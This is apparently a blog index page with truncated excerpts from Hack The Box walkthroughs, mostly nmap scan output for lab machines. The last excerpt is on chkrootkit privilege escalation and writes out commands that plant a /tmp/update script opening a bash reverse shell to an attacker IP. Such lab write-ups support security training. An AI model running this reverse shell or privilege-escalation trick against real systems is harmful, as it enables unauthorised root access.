Linux Machines on rchitect

Hackthebox Knife

Fri, 13 May 2022 00:00:00 +0000

Hackthebox Knife Walkthrough Link to heading

Initial Enumeration Link to heading

Port Scan Link to heading

sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.242 127 ⨯
sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.242
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:19 EDT
Nmap scan report for 10.10.10.242
Host is up (0.066s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:19 EDT
Warning: 10.10.10.242 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.242
Host is up (0.049s latency).
All 65535 scanned ports on 10.10.10.242 are open|filtered (65483) or closed (52)

Nmap done: 1 IP address (1 host up) scanned in 46.51 seconds

Vulnarabilty Scan Link to heading

 nmap -Pn -p 22,80 -sC -sV -oN details.txt 10.10.10.242
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:41 EDT
Nmap scan report for 10.10.10.242
Host is up (0.044s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds

Directory Scan Link to heading

Website Front end:

Hackthebox Jarvis

Mon, 25 Apr 2022 00:00:00 +0000

This post is about the Walkthrough of the hackthebox machine: Jarvis

Hackthebox Brainfuck

Thu, 14 Apr 2022 00:00:00 +0000

Hackthebox Brainfuck Walkthrough Link to heading

Initial Enumeration Link to heading

Port Scan Link to heading

sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.17 1 ⨯
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:40 EDT
Nmap scan report for 10.10.10.17
Host is up (0.051s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
110/tcp open pop3
143/tcp open imap
443/tcp open https


$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.17 1 ⨯
HHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:41 EDT
Nmap scan report for 10.10.10.17
Host is up (0.045s latency).
Not shown: 65532 open|filtered ports
PORT STATE SERVICE
110/udp closed pop3
143/udp closed imap
443/udp closed https

Vulnarability Scan Link to heading

ocky㉿kali)-[~/hckbox/node]
└─$ nmap -Pn -p 22,25,110,143,443 -sC -sV -oN details.txt 10.10.10.17 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:43 EDT
Nmap scan report for 10.10.10.17
Host is up (0.042s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA RESP-CODES USER AUTH-RESP-CODE TOP SASL(PLAIN) PIPELINING UIDL
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID LOGIN-REFERRALS more AUTH=PLAINA0001 have listed LITERAL+ capabilities IMAP4rev1 post-login Pre-login SASL-IR OK IDLE ENABLE
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_ http/1.1
| tls-nextprotoneg: 
|_ http/1.1
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

There was a certificate warning on https service. The site looks like below( seems ngnix is running)

Hackthebox Node

Tue, 05 Apr 2022 00:00:00 +0000

Hackthebox Node Walkthrough Link to heading

Initial Enumeration Link to heading

Port Scan Link to heading

sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.58 1 ⨯
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 19:43 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 24.10% done; ETC: 19:43 (0:00:09 remaining)
Nmap scan report for 10.10.10.58
Host is up (0.049s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp

$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.58 1 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 19:57 EDT
Nmap scan report for 10.10.10.58
Host is up.
All 65535 scanned ports on 10.10.10.58 are open|filtered

Vulnarability Scan Link to heading

ocky㉿kali)-[~/hckbox/node]
└─$ nmap -Pn -p 22,3000 -sC -sV -oN details.txt 10.10.10.58
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 20:04 EDT
Nmap scan report for 10.10.10.58
Host is up (0.049s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info: 
|_ Logs: /login
| hadoop-tasktracker-info: 
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see 2 ports open and on port 3000 apache service seems running. This is how the page lookes on port 3000

Hackthebox Tartarsauce

Sat, 26 Mar 2022 00:00:00 +0000

This post is about the Walkthrough of the hackthebox machine: Tartarsauce

chkrootkit exploit for privilege esclation

Wed, 09 Mar 2022 00:00:00 +0000

Chkrootkit Exploit Link to heading

I have tried pspy and i could see the chkrootkit

Lets search for the exploit

As per this exploit if you create any exploit ,if you create a file named “update” under /tmp.

amrois@nineveh:/tmp$ printf '#!/bin/sh\n' > update
amrois@nineveh:/tmp$ printf '/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.9/5555 0<&1"\n' >> update
amrois@nineveh:/tmp$ chmod +x update

Or You can use EOF to repalce printf command like below